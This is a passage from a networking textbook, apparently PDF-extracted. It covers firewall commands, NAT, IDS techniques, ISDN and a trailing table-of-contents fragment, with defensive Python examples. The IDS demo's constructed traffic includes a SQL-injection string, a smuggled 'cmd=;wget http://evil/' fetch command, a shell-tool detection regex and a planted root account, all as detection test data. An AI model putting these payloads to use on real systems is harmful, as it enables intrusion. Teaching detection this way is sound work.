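    return (proto in ("any", pkt["proto"])
            and ip_address(pkt["src"]) in ip_network(src)
            and ip_address(pkt["dst"]) in ip_network(dst)
            and (dport is None or dport == pkt["dport"]))

def acl_lookup(acl, pkt):
    """Top-down, first match wins; no match means the implicit deny."""
    for rule in acl:
        if rule_matches(rule, pkt):
            return rule[0]
    return "deny"

def shadowed_rules(acl):
    """Indices of rules that can never match because an earlier rule covers them."""
    shadowed = []
    for i, (_, proto, src, dst, dport) in enumerate(acl):
        for _, p2, s2, d2, dp2 in acl[:i]:
            if ((p2 == "any" or p2 == proto)
                    and ip_network(src).subnet_of(ip_network(s2))
                    and ip_network(dst).subnet_of(ip_network(d2))
                    and (dp2 is None or dp2 == dport)):
                shadowed.append(i)
                break
    return shadowed

def flow_key(pkt):
    return (pkt["proto"], pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])

def reverse_key(pkt):
    return (pkt["proto"], pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])

class StatefulFirewall:
    """Outbound traffic is checked against the ACL; permitted flows are recorded so that
    only their replies are let back in. Anything else inbound is checked against the
    inbound ACL, which is empty here, i.e. implicit deny."""

    def __init__(self, outbound_acl, inbound_acl=()):
        self.outbound_acl = list(outbound_acl)
        self.inbound_acl = list(inbound_acl)
        self.state = set()          # keys of permitted outbound flows

    def handle(self, direction, pkt):
        if direction == "out":
            verdict = acl_lookup(self.outbound_acl, pkt)
            if verdict == "permit":
                self.state.add(flow_key(pkt))
            return verdict
        if reverse_key(pkt) in self.state:
            return "permit"         # reply to a session we opened
        return acl_lookup(self.inbound_acl, pkt)

def packet(proto, src, sport, dst, dport):
    return {"proto": proto, "src": src, "sport": sport, "dst": dst, "dport": dport}

def demo():
    fw = StatefulFirewall(OUTBOUND_ACL)
    return [
        fw.handle("out", packet("tcp", "10.10.10.14", 40000, "203.0.113.5", 80)),   # permit
        fw.handle("in",  packet("tcp", "203.0.113.5", 80, "10.10.10.14", 40000)),   # permit: reply
        fw.handle("in",  packet("tcp", "198.51.100.9", 80, "10.10.10.14", 40001)),  # deny: unsolicited
        fw.handle("out", packet("tcp", "10.10.10.14", 40002, "203.0.113.5", 23)),   # deny: first rule
        fw.handle("in",  packet("tcp", "203.0.113.5", 23, "10.10.10.14", 40002)),   # deny: no state
        fw.handle("out", packet("tcp", "10.10.10.14", 40003, "203.0.113.5", 25)),   # deny: implicit
    ]

if __name__ == "__main__":
    print(demo())
```

The third packet is the one a stateless filter struggles with: it has source port 80 and a high destination port, exactly like a legitimate web reply, and a stateless ACL written to let replies in would have to permit it. With the state table it is dropped because no inside host ever opened that session. Running shadowed_rules on an ACL before installing it catches the classic mistake of placing a broad permit above a narrower deny.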
14.5.3.1 Interface Command
The interface command identifies the interface hardware card, sets the speed of the interface and enables the interface, all in one command.
SYNTAX: interface hardware_id hardware_speed [shutdown]
hardware_id indicates the interface's physical location on the firewall. hardware_speed indicates the connection speed; the firewall provides the following options:
- 1000sxfull: sets full-duplex Gigabit Ethernet
- 1000basesx: sets half-duplex Gigabit Ethernet
- 1000auto: automatically detects and negotiates full/half duplex
- 10full: sets 10 Mbps full-duplex Ethernet
- 100full: sets 100 Mbps full-duplex Ethernet
- shutdown: this parameter administratively shuts down the interface.
nameif command
It is used to name an interface and assign it a security level from 0 to 100. The outside and inside interfaces are named by default and have the default security levels 0 and 100 respectively; any other interface, such as a DMZ, is given a value between 1 and 99. By default the interfaces are identified by their hardware ID: Ethernet 0 is the outside interface, and Ethernet 1 is the inside interface. Traffic is allowed by default from a higher security level to a lower one, but not from a lower level to a higher one unless it is explicitly permitted.
SYNTAX: nameif hardware_id if_name security_level
hardware_id indicates the interface's physical location on the firewall. if_name is the name by which we refer to this interface. security_level is a numerical value from 0 to 100 indicating the security level.
Examples:
nameif ethernet0 outside security0
nameif ethernet1 inside security100
nameif ethernet2 dmz security20
We can see the configuration with the show nameif command.
ip address command
All interfaces must be configured with an IP address. The ip address command binds a logical address (IP address) to the interface name.
SYNTAX: ip address if_name ip_address [netmask]
if_name is the interface name that was configured with the nameif command. ip_address is the interface's IP address. netmask is the appropriate network mask; if the mask is not entered the firewall assigns a classful network mask, so it is best to give it explicitly.
Example: ip address inside 10.10.10.14 255.255.255.0
We can see the configuration with the show ip command.
nat command
The nat (Network Address Translation) command translates a set of IP addresses into another set of IP addresses.
SYNTAX: nat (if_name) nat_id local_ip [netmask]
(if_name) is the internal network interface name. nat_id is the ID number that is matched with the global address pool. local_ip is the IP address that is translated, usually the inside network address. netmask is the network mask for the local IP address.
There are two types of NAT:
- Static: one inside address is permanently mapped to one global address, for example a web server in our network whose private IP address we do not want to make public. Users reach the server at the global address, and every connection to it still passes through the firewall, which applies its rules. (On this firewall a one-to-one mapping is configured with the static command rather than with nat.)
- Dynamic: if there are lots of PCs in a network and all want to access the Internet, it is not practical to give every PC its own public IP, so at the firewall each PC's private IP is replaced with a public IP (or a port on a shared public IP) taken from a pool when the PC opens a connection.
Examples:
nat (inside) 1 10.10.10.0 255.255.255.0
nat (inside) 1 172.16.1.0 255.255.255.0
global command
The global command defines the address or range of addresses into which the addresses defined by the nat command are translated. The nat_id must be identical to the nat_id used in the nat command: it pairs the global command with the nat command so that translation can take place.
SYNTAX: global (if_name) nat_id global_ip | global_ip-global_ip [netmask]
(if_name) is the external network interface where these global addresses are used. nat_id identifies the global pool and matches it with the nat command it pairs with. global_ip is a single IP address; when a single address is specified the firewall automatically performs Port Address Translation (PAT). global_ip-global_ip defines a range of global IP addresses to be used by the firewall for NAT. netmask is the network mask for the global IP address(es).
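As an added example for this edition (not code from the manual, and not the firewall's own implementation), the following Python translation table mimics what the nat/global pair does: static one-to-one NAT for a server and dynamic PAT for the rest of the inside network behind a single global address, including the fact that an inbound packet with no matching translation entry is dropped. Addresses are constructed from the RFC 5737 documentation ranges.

```python
# Added example (not from the manual): a translation table doing static one-to-one NAT
# for a server plus dynamic PAT for the rest of the inside network behind one global
# address, as the nat/global command pair does. Addresses are constructed (RFC 5737
# documentation ranges stand in for public addresses).

class Translator:
    PAT_PORTS = range(1024, 65536)     # source ports handed out on the global address

    def __init__(self, global_ip, static=None):
        self.global_ip = global_ip
        self.static = dict(static or {})                     # local_ip -> global_ip
        self.static_rev = {g: l for l, g in self.static.items()}
        self.xlate = {}         # (proto, local_ip, local_port) -> global_port
        self.xlate_rev = {}     # (proto, global_port) -> (local_ip, local_port)
        self._free = iter(self.PAT_PORTS)

    def outbound(self, pkt):
        """Rewrite the source of a packet leaving the inside interface."""
        src = pkt["src"]
        if src in self.static:                               # one-to-one: address only
            return {**pkt, "src": self.static[src]}
        key = (pkt["proto"], src, pkt["sport"])
        if key not in self.xlate:                            # new flow: allocate a port
            try:
                gport = next(self._free)
            except StopIteration:
                raise RuntimeError("PAT port pool exhausted") from None
            self.xlate[key] = gport
            self.xlate_rev[(pkt["proto"], gport)] = (src, pkt["sport"])
        return {**pkt, "src": self.global_ip, "sport": self.xlate[key]}

    def inbound(self, pkt):
        """Rewrite the destination of a packet arriving from outside.

        Returns None when no translation exists: such a packet is dropped, which is
        why hosts behind PAT are not reachable from outside unless a static mapping
        is configured for them.
        """
        dst = pkt["dst"]
        if dst in self.static_rev:
            return {**pkt, "dst": self.static_rev[dst]}
        if dst == self.global_ip:
            entry = self.xlate_rev.get((pkt["proto"], pkt["dport"]))
            if entry is not None:
                return {**pkt, "dst": entry[0], "dport": entry[1]}
        return None

def packet(proto, src, sport, dst, dport):
    return {"proto": proto, "src": src, "sport": sport, "dst": dst, "dport": dport}

def demo():
    t = Translator("203.0.113.1", static={"10.10.10.5": "203.0.113.10"})
    out1 = t.outbound(packet("tcp", "10.10.10.14", 40000, "198.51.100.7", 80))
    out2 = t.outbound(packet("tcp", "10.10.10.15", 40000, "198.51.100.7", 80))  # same local port
    out3 = t.outbound(packet("tcp", "10.10.10.14", 40000, "198.51.100.7", 80))  # existing flow
    reply = t.inbound(packet("tcp", "198.51.100.7", 80, "203.0.113.1", out2["sport"]))
    unsolicited = t.inbound(packet("tcp", "198.51.100.7", 80, "203.0.113.1", 5555))
    to_server = t.inbound(packet("tcp", "198.51.100.7", 51000, "203.0.113.10", 80))
    return t, out1, out2, out3, reply, unsolicited, to_server

if __name__ == "__main__":
    _, *results = demo()
    for r in results:
        print(r)
```

Two inside hosts both using local port 40000 get distinct global ports, which is what lets a single global address serve the whole network; the reverse table is what turns the reply to port 1025 back into 10.10.10.15:40000. A real firewall also ages entries out of the table, so the pool is not exhausted by dead flows.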
14.6.1 HIDS
Host Intrusion Detection Systems run on individual hosts or devices on the network. A HIDS monitors the inbound and outbound packets of that device only, together with its logs and files, and alerts the user or administrator if suspicious activity is detected.
14.6.2 NIDS
Network Intrusion Detection Systems are placed at a strategic point or points within the network to monitor traffic to and from all devices on the network. Ideally all inbound and outbound traffic would be inspected, but doing so may create a bottleneck that impairs the overall speed of the network. When an unauthorized user logs in successfully, or attempts to log in, they are best tracked with a host-based IDS; detecting the unauthorized user before the log-on attempt is best accomplished with a network-based IDS.
14.6.2.1 There are four basic techniques used to detect intruders, of which three are listed here:
- Anomaly detection
- Misuse detection (signature detection)
- Target monitoring
A passive IDS simply detects and alerts. When suspicious or malicious traffic is detected an alert is generated and sent to the administrator or user, and it is up to them to take action to block the activity or respond in some way.
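The three techniques listed above, as an added Python example for this edition (not code from the manual): signature matching over constructed HTTP payloads (misuse detection), an anomaly check that flags a source whose connection rate far exceeds a learned baseline, and target monitoring that compares file digests against a recorded baseline. All packets, rates and file contents are constructed, and the two signatures are deliberately small illustrations rather than a production rule set.

```python
import hashlib
import re
from collections import Counter

# Added example (not from the manual): the three detection techniques listed above
# applied to constructed data: signature (misuse) detection on packet payloads, anomaly
# detection on connection rates, and target monitoring of file contents.

# --- misuse / signature detection: known-bad patterns in payloads -----------------
SIGNATURES = {
    "sql-injection": re.compile(rb"(?i)('\s*or\s+'1'\s*=\s*'1|union\s+select)"),
    "shell-metachar": re.compile(rb"[;|`]\s*(cat|wget|curl)\s"),
}

def signature_alerts(packets):
    """packets: list of (src, payload bytes) -> list of (src, signature name)."""
    return [(src, name) for src, payload in packets
            for name, pattern in SIGNATURES.items() if pattern.search(payload)]

# --- anomaly detection: behaviour far from the learned baseline ------------------
def anomaly_alerts(baseline_per_minute, observed, threshold=3.0):
    """observed: list of (src, dst_port) seen in one minute. Flags sources whose
    connection count exceeds threshold x the baseline rate (a crude scan/flood check)."""
    counts = Counter(src for src, _ in observed)
    return sorted(src for src, n in counts.items() if n > threshold * baseline_per_minute)

# --- target monitoring: has a watched file changed since the baseline? ----------
def file_digest(content):
    return hashlib.sha256(content).hexdigest()

def target_alerts(baseline, current):
    """baseline/current: dict path -> bytes. Reports modified, added and removed files."""
    alerts = []
    for path in sorted(set(baseline) | set(current)):
        if path not in current:
            alerts.append((path, "removed"))
        elif path not in baseline:
            alerts.append((path, "added"))
        elif file_digest(baseline[path]) != file_digest(current[path]):
            alerts.append((path, "modified"))
    return alerts

def demo():
    packets = [  # constructed traffic
        ("10.10.10.14", b"GET /index.html HTTP/1.0\r\n"),
        ("198.51.100.9", b"GET /login?user=admin' OR '1'='1 HTTP/1.0\r\n"),
        ("198.51.100.9", b"GET /cgi-bin/x?cmd=;wget http://evil/ HTTP/1.0\r\n"),
    ]
    # one normal client plus one source sweeping 40 ports in a minute
    observed = [("10.10.10.14", 80)] * 4 + [("198.51.100.9", p) for p in range(20, 60)]
    baseline = {"/etc/passwd": b"root:x:0:0::/root:/bin/sh\n", "/bin/ls": b"ELF...ls"}
    current = {"/etc/passwd": b"root:x:0:0::/root:/bin/sh\nevil:x:0:0::/:/bin/sh\n",
               "/bin/ls": b"ELF...ls", "/tmp/.hidden": b"#!/bin/sh\n"}
    return (signature_alerts(packets),
            anomaly_alerts(baseline_per_minute=5, observed=observed),
            target_alerts(baseline, current))

if __name__ == "__main__":
    for result in demo():
        print(result)
```

Signatures only catch what someone has already written a pattern for, the anomaly check catches the port sweep without knowing anything about it but would also fire on a legitimately busy host, and target monitoring says nothing about the network yet is the one that notices the extra UID-0 account in /etc/passwd; a usable IDS combines them rather than relying on one.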
15.1 STANDARDS
IEEE developed the 802.11 standards to provide wireless networking technology comparable to wired Ethernet. With developments in the field over time, three standards have been finalized: 802.11a, 802.11b and 802.11g.
Table 15.1
15.2 TOPOLOGIES
There are two topologies on which WLAN works: -Infrastructure Network - Ad hoc Network
Figure 15.1
Figure 15.2
ISDN is a set of communication protocols proposed by telephone companies that allows them to carry a group of digital services conveying data, text, voice, music, graphics and video to end users simultaneously, and it was designed to achieve this over the telephone systems already in place.
16.1.1 B channel
Bearer channels (B channels) are used to transport data; they are called bearer channels because they bear the burden of carrying the data. B channels operate at speeds of up to 64 kbps.
16.1.2 D channel
D channels are used for signalling. They establish the session before the data is actually transferred.
16.2.1 BRI: ISDN Basic Rate Interface (BRI, also known as 2B+D) service provides two B channels and one D channel. Each BRI B channel operates at 64 kbps and carries data, while the BRI D channel operates at 16 kbps and usually carries control and signalling information.
16.2.2 PRI: According to the North American standard, the ISDN Primary Rate Interface (PRI, also known as 23B+D) service delivers 23 B channels of 64 kbps and one D channel of 64 kbps, for a total bit rate of up to 1.544 Mbps (a T1). According to the European standard, PRI provides 30 B channels of 64 kbps and one D channel of 64 kbps, for a total bit rate of up to 2.048 Mbps (an E1).
Figure 16.1 Router A is ordered with an ISDN BRI U reference point, the interface between the customer premises and the provider's line (ITU-T I.430 defines the BRI physical layer). Router B is bought with an ISDN BRI S/T interface, implying that it must be cabled to a function group NT1 device. An NT1 function group device must be connected to the provider's line through a U reference point; the S/T interface defines the connection to Router B. Router B is called a TE1 (Terminal Equipment 1) function group device. Non-ISDN equipment is called a TE2 (Terminal Equipment 2) device and is attached using the R reference point to a terminal adapter (TA) function group device. Alternatively, a TE1 can connect using an S reference point to an NT2 function group,
Table of Contents
1. Introduction to Microsoft Server 1
1.3 Hardware Requirement ........................................................................................................................5 1.4 Windows Server 2008 Editions - Features ....................................................................................6
1.4.1 New and Updated Features in Windows Server 2008 ................................................................ 6
1.5 Edition Comparison by Server Role ................................................................................................7 1.6 Edition Comparison by Server Core Installation Option ........................................................8
105
2.7 Group Policy .......................................................................................................................................... 19 2.8 Sites ........................................................................................................................................................... 19 2.9 Domains................................................................................................................................................... 19 2.10 Organizational units (OUs) ............................................................................................................ 19
2.10.1 Delegating Group Policy Administration .................................................................................... 20
2.13 Domain Functional Levels .............................................................................................................. 22 2.14 Forest Functional Levels ................................................................................................................. 23 2.15 Read-Only Domain Controllers ................................................................................................... 23
3. SERVERS 24
3.1 Dynamic Host Configuration Protocol (DHCP) ....................................................................... 24 3.2 Scopes ...................................................................................................................................................... 25 3.3 Domain Name System ....................................................................................................................... 25
3.3.1 Zones ........................................................................................................................................................ 25 3.3.2 Zone Types.............................................................................................................................................. 25 3.3.3 Zone Files ................................................................................................................................................ 26 3.3.4 Zone Resource Records ...................................................................................................................... 26 3.3.5 Dynamic Update.................................................................................................................................... 27
3.5 Hypertext Transfer Protocol Secure (HTTPS) ........................................................................... 29 3.6 File Transfer Protocol ......................................................................................................................... 30
106
4.1 Salient Features of LINUX................................................................................................................. 40 4.2 Advantages of Linux ........................................................................................................................ 43 4.3 LINUX INSTALLATION ........................................................................................................................ 44
4.3.1 Types of installation Method ............................................................................................................ 45 4.3.2 Types of Boot loader............................................................................................................................ 45
4.4 Hard Disk Partitioning Method ...................................................................................................... 45 4.5 Type of X-Window System (Desktop) ...................................................................................... 45
5. LINUX KERNEL & SHELL 45
5.3 Linux Utilities and Application Program .................................................................................... 46 5.4 LINUX SUPPORTED FILE SYSTEMS ............................................................................................... 46
5.4.1 MS-DOS, VFAT, and UMSDOS .......................................................................................................... 46 5.4.2 ISO 9660 CDROM ................................................................................................................................. 47 5.4.3 Minix.......................................................................................................................................................... 47 5.4.4 NTFS .......................................................................................................................................................... 47 5.4.5 OS/2 HPFS ............................................................................................................................................... 47 5.4.6 /proc.......................................................................................................................................................... 47 5.4.7 /dev/pts.................................................................................................................................................... 47 5.4.8 ROM .......................................................................................................................................................... 47 5.4.9 Second Extended (ext2) ...................................................................................................................... 47 5.4.10 Third Extended (ext3) ........................................................................................................................ 47 5.4.11 NFS .......................................................................................................................................................... 47 5.4.12 SMB ......................................................................................................................................................... 
47 5.4.13 NCP ......................................................................................................................................................... 47
107
7.1 Web Browsers ....................................................................................................................................... 54 7.2 Mail Clients ............................................................................................................................................. 54 7.3 Office Application ................................................................................................................................ 54 7.4 GUI Editors .............................................................................................................................................. 54
8. LINUX NETWORKING 56
10.1 Types of Firewall ................................................................................................................................ 59 10.2 Iptables & netfilter............................................................................................................................ 59 10.3 Iptables syntax and commands .................................................................................................. 60
11. SERVERS 61
11.5 NFS Server & client ........ 66
11.6 Samba Server ........ 67
11.6.1 These are the four Samba RPM packages that you need ........ 68
11.6.2 Service Profile: Samba ........ 68
11.6.3 SAMBA SERVER ........ 68
11.6.4 SAMBA SERVER SHARING PRINTER, FILE & DIRECTORY ........ 69
12. INTRODUCTION TO NETWORKING 70
12.1 Definition ........ 70
12.2 A network consists of a ........ 70
12.3 Requirement of Networking ........ 70
13.2 Private IP ........ 78
13.3 MASKING ........ 78
13.4 SUBNETTING ........ 78
13.5 Some terminologies that are used with networking models ........ 79
13.5.1 Collision Domain ........ 79
13.5.2 Broadcast Domain ........ 79
13.5.3 MAC ........ 79
13.5.4 Burned-in address ........ 79
13.5.5 Unicast address ........ 79
16.3 ISDN Function Groups and Reference Points ........ 103
16.4 Function Groups ........ 104